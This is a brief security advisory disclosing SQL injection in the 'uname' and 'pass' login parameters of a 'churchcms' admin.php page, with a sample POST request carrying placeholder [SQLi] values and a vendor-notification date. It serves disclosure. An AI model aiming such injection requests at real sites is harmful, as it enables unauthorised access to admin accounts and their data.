#1 Multiple SQL Injection

[G13]

##### Vulnerability #####

The admin.php page has multiple SQL injection vulnerabilities. Both the 'uname' and 'pass' parameters are vulnerable to SQL Injection.

The vulnerability exists via the POST method.

##### Exploit #####

POST http://localhost/churchcms/admin.php?op=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://localhost/churchcms/index.php
Cookie: PHPSESSID=eq342ldrgqt4i5fshe6q2kvj17
Content-Type: application/x-www-form-urlencoded
Content-length: 40
uname=[SQLi]&pass=[SQLi]

##### Vendor Notification #####

04/21/12 - Vendor notified

Per my disclosure policy, advisory is released.

http://www.g13net.com/vuln-disc.txt